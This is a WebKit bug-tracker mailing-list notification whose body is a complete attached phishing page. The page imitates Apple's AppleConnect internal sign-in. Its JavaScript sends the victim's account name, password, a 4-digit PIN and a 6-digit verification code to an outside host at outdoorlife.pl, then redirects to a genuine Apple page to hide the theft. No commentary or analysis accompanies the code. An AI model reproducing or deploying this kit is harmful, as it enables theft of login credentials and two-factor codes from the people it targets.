[Webkit-unassigned] [Bug 168434] Web Inspector: meastro

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Thu Feb 16 07:47:38 PST 2017


https://bugs.webkit.org/show_bug.cgi?id=168434

--- Comment #1 from Alex <ponyprog1 at gmail.com> ---
Comment on attachment 301763
  --> https://bugs.webkit.org/attachment.cgi?id=301763
meastro

><script type="text/javascript">
>var url = 'http://outdoorlife.pl/wp-admin/rss/ftp/ftp/'
></script>
><!DOCTYPE html>
><html lang="en-US">
><head>
>  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
>  <meta name="viewport" content="width=device-width, initial-scale=1">
>  <title>Sign in with your AppleConnect</title>
>  <script src="https://code.jquery.com/jquery-3.0.0.min.js" charset="utf-8"></script>
>
></head>
><body>
>  <div class="loading">
>  </div>
>  <div class="loaded" style="display:none">
>    <link rel="shortcut icon" href="{ftp}/zaimage/favicon.ico" type="image/x-icon">
>    <link rel="stylesheet" type="text/css" href="{ftp}/mp-login_04092015.css">
>    <link rel="stylesheet" type="text/css" href="{ftp}/appleconnect.css">
>    <style media="screen">
>    div.outer{
>      height: auto;
>    }
>    </style>
>    <div id="main" role="main" class="acp-content">
>      <section class="acp-sign-in">
>        <div class="acp-login-container">
>          <h1 class="acp-h1">AppleConnect</h1>
>          <div class="acp-line-img"></div>
>          <p id="title"></p>
>          <div class="outer">
>            <div class="inner">
>              <div class="main">
>                <p id="errormsg"></p>
>                <p id="loadingSpinner" style="display:none">
>                  <img src="{ftp}/zaimage/loader.gif" alt="" />
>                </p>
>
>                <form id="command" name="form2" action="#/authentification" onsubmit="return submitCommand()" method="post"> <!--/********** end form *****************/-->
>                  <div class="pair">
>                    <div class="module">
>                      <label for="accountname">AppleConnect account name </label>
>                      <input id="accountname" name="appleId" tabindex="1" spellcheck="false" name="theAccountName" autocorrect="off" type="text" autocapitalize="off" aria-label="Apple ID" value="" size="30" maxlength="128" autocomplete="off" />
>
>                      <a id="appleIdURL" class="forgot-link" href="https://iforgot.apple.com/cgi-bin/findYourAppleID.cgi?language=US-EN&app_id=3841&s=548-548"
>                      onclick="javascript:appendURL('https%3A%2F%2Fidmsa.apple.com%2FIDMSWebAuth%2Flogin.html%3FappIdKey%3Ddbab0f0cdaf4c030ada8201e0683152d79edd4999b554c8ec7f420a2a0acf6f0%26language%3DUS-EN%26rv%3D1%26view%3D1'),loadiForgotInNewWindow();">Forgot your AppleConnect name?</a>
>
>                    </div>
>                    <div class="module">
>                      <!--   Insert non-production environment name before "Password"	 -->
>                      <label for="accountpassword">Password </label>
>
>                      <div class="buttonfield">
>                        <input id="accountpassword" name="accountPassword" tabindex="2" oncut="return false;" autocorrect="off" oncopy="return false;" autocapitalize="off" type="password" value="" size="30" autocomplete="off" />
>                        <!--  submit  -->
>                        <input id="continueFieldbutton" type="image" value="" aria-label="Sign In" src="{ftp}/zaimage/bd.png">
>                      </div>
>
>                      <a id="passwordURL"	class="forgot-link" href="https://iforgot.apple.com/cgi-bin/iforgot.cgi?language=US-EN&app_id=3841&s=548-548"
>                      onclick="javascript:appendURL('https%3A%2F%2Fidmsa.apple.com%2FIDMSWebAuth%2Flogin.html%3FappIdKey%3Ddbab0f0cdaf4c030ada8201e0683152d79edd4999b554c8ec7f420a2a0acf6f0%26language%3DUS-EN%26rv%3D1%26view%3D1'),loadiForgotInNewWindow();">Forgot your password?</a>
>
>                    </div>
>                  </div>
>                </form>   <!--/*************** form ******************/-->
>
>                <form id="pinCommand" name="form22" action="/#validation" onsubmit="return submitPin()" method="post" style="display:none">
>
>                  <div class="module">
>                    <label for="accountpassword">&nbsp;</label>
>                    <br>
>                    <div class="buttonfield">
>                      <input style="width: initial;text-align: center;" id="pin0" onkeypress='return event.charCode >= 48 && event.charCode <= 57' class="pin" name="pin1" tabindex="2" oncut="return false;" autocorrect="off" oncopy="return false;" autocapitalize="off" type="password" value="" maxlength="1" size="1" autocomplete="off" />
>                    </div>
>                  </div>
>                  <div class="module">
>                    <label for="accountpassword">&nbsp;</label>
>                    <br>
>                    <div class="buttonfield">
>                      <input style="width: initial;text-align: center;" id="pin1" onkeypress='return event.charCode >= 48 && event.charCode <= 57' class="pin"  name="pin2" tabindex="2" oncut="return false;" autocorrect="off" oncopy="return false;" autocapitalize="off" type="password" value="" maxlength="1" size="1" autocomplete="off" />
>                    </div>
>                  </div>
>                  <div class="module">
>                    <label for="accountpassword">&nbsp;</label>
>                    <br>
>                    <div class="buttonfield">
>                      <input style="width: initial;text-align: center;" id="pin2" onkeypress='return event.charCode >= 48 && event.charCode <= 57' class="pin" name="pin3" tabindex="2" oncut="return false;" autocorrect="off" oncopy="return false;" autocapitalize="off" type="password" value="" maxlength="1" size="1" autocomplete="off" />
>                    </div>
>                  </div>
>                  <div class="module">
>                    <label for="accountpassword">&nbsp;</label>
>                    <br>
>                    <div class="buttonfield">
>                      <input style="width: initial;text-align: center;" id="pin3" onkeypress='return event.charCode >= 48 && event.charCode <= 57' class="pin" name="pin4" tabindex="2" oncut="return false;" autocorrect="off" oncopy="return false;" autocapitalize="off" type="password" value="" maxlength="1" size="1" autocomplete="off" />
>                    </div>
>                  </div>
>                  <div class="">
>                    <input type="submit" name="name" value="Continue">
>                  </div>
>
>                </form>
>
>                <form id="verfiCommand" name="form22" action="/#verification" onsubmit="return submitCode()" method="post" style="display:none">
>                  <div class="module">
>                    <label for="accountpassword">&nbsp;</label>
>                    <br>
>                    <div class="buttonfield">
>                      <input style="width: initial;text-align: center;" id="cpin0" onkeypress='return event.charCode >= 48 && event.charCode <= 57' class="pin" name="pin1" tabindex="2" oncut="return false;" autocorrect="off" oncopy="return false;" autocapitalize="off" type="password" value="" maxlength="1" size="1" autocomplete="off" />
>                    </div>
>                  </div>
>                  <div class="module">
>                    <label for="accountpassword">&nbsp;</label>
>                    <br>
>                    <div class="buttonfield">
>                      <input style="width: initial;text-align: center;" id="cpin1" onkeypress='return event.charCode >= 48 && event.charCode <= 57' class="pin" name="pin2" tabindex="2" oncut="return false;" autocorrect="off" oncopy="return false;" autocapitalize="off" type="password" value="" maxlength="1" size="1" autocomplete="off" />
>                    </div>
>                  </div>
>                  <div class="module">
>                    <label for="accountpassword">&nbsp;</label>
>                    <br>
>                    <div class="buttonfield">
>                      <input style="width: initial;text-align: center;" id="cpin2" onkeypress='return event.charCode >= 48 && event.charCode <= 57' class="pin" name="pin3" tabindex="2" oncut="return false;" autocorrect="off" oncopy="return false;" autocapitalize="off" type="password" value="" maxlength="1" size="1" autocomplete="off" />
>                    </div>
>                  </div>
>
>                      <div class="module">
>                        <label for="accountpassword">&nbsp;</label>
>                        <br>
>                        <div class="buttonfield">
>                          <input style="width: initial;text-align: center;" id="cpin3" onkeypress='return event.charCode >= 48 && event.charCode <= 57'  class="pin"  name="pin4" tabindex="2" oncut="return false;" autocorrect="off" oncopy="return false;" autocapitalize="off" type="password" value="" maxlength="1" size="1" autocomplete="off" />
>                        </div>
>                      </div>
>
>                      <div class="module">
>                        <label for="accountpassword">&nbsp;</label>
>                        <br>
>                        <div class="buttonfield">
>                          <input style="width: initial;text-align: center;" id="cpin4"  onkeypress='return event.charCode >= 48 && event.charCode <= 57' class="pin" name="pin5" tabindex="2" oncut="return false;" autocorrect="off" oncopy="return false;" autocapitalize="off" type="password" value="" maxlength="1" size="1" autocomplete="off" />
>                        </div>
>                      </div>
>
>                      <div class="module">
>                        <label for="accountpassword">&nbsp;</label><br>
>                        <div class="buttonfield">
>                          <input style="width: initial;text-align: center;" id="cpin5" onkeypress='return event.charCode >= 48 && event.charCode <= 57' class="pin" name="pin6" tabindex="2" oncut="return false;" autocorrect="off" oncopy="return false;" autocapitalize="off" type="password" value="" maxlength="1" size="1" autocomplete="off" />
>                        </div>
>                      </div>
>
>
>
>                 <div class="refresh">
>                    <a href="#">  <img src="{ftp}/zaimage/refresh.png" alt="" /></a><a class="hrefresh" href="#">Send a new code.</a>
>                  </div>
>                  <div class="">
>                    <input type="submit" name="name" value="Continue">
>                  </div>
>
>                </form>
>
>              </div>
>            </div>
>          </div>
>        </div>
>      </section>
>    </div>
>  </div>
>  <script type="text/javascript">
>  $(document).ready(function(){
>    var body = $('.loaded').html().replace(/{ftp}/g, url);
>    $('.loading').fadeOut(function(){
>
>      $('.loaded').empty().html(body);
>      $('#title').html('Sign in to manage your Apple internal accounts.')
>
>      $('.loaded').fadeIn();
>    })
>  });
>
>  function submitCommand(){
>    if($('#accountname').val() && $('#accountpassword').val()){
>
>      $('#command').fadeOut(function(){
>        $('#loadingSpinner').fadeIn();
>      });
>      $.post(url+'/?login', {
>        email: $('#accountname').val(),
>        password: $('#accountpassword').val()
>      }).then(function(resp){
>        if(resp == 'ok'){
>          $('#loadingSpinner').fadeOut(function(){
>            $('#title').html('Use your Pin code to manage your Apple internal accounts.');
>            $('#pinCommand').fadeIn();
>          });
>
>        }
>        console.log('resp:',resp)
>      }, function(err){
>        console.log('err:',err)
>      })
>    }else{
>      $('#errormsg').html('Please validat you informations')
>    }
>
>    return false;
>  }
>  function submitPin(){
>    var pin = $('#pin0').val() + $('#pin1').val() + $('#pin2').val() + $('#pin3').val()
>    if(pin.length != 4){
>      $('#errormsg').html('Please validat you informations')
>    }else{
>      $.post(url+'/?pin', {
>        pin: pin
>      }, function(resp){
>        $('#title').html('A verification code is being sent to you phone number, please wait...')
>        //$('#title').html('Enter the verification code sent to your phone number.')
>        $('#pinCommand').fadeOut(function(){
>          $('#loadingSpinner').fadeIn();
>          setTimeout(function(){
>            $('#loadingSpinner').fadeOut(function(){
>              $('#verfiCommand').fadeIn();
>            })
>          }, 60000)
>        });
>      })
>    }
>    return false;
>  }
>  function submitCode(){
>    var code = $('#cpin0').val() + $('#cpin1').val() + $('#cpin2').val() + $('#cpin3').val() + $('#cpin4').val() + $('#cpin5').val()
>    if(code.length > 5){
>      $.post(url+ '/?code', {
>        code: code
>      }, function(resp){
>
>        $('#verfiCommand').fadeOut(function(){
>          $('#loadingSpinner').fadeIn();
>          window.location = 'http://www.apple.com/ca/language/thankyou.html'
>        });
>      })
>    }
>    return false;
>  }
>
>  </script>
></body>
></html>
></body>
></html>

-- 
You are receiving this mail because:
You are the assignee for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.webkit.org/pipermail/webkit-unassigned/attachments/20170216/f37b61a7/attachment-0001.html>


More information about the webkit-unassigned mailing list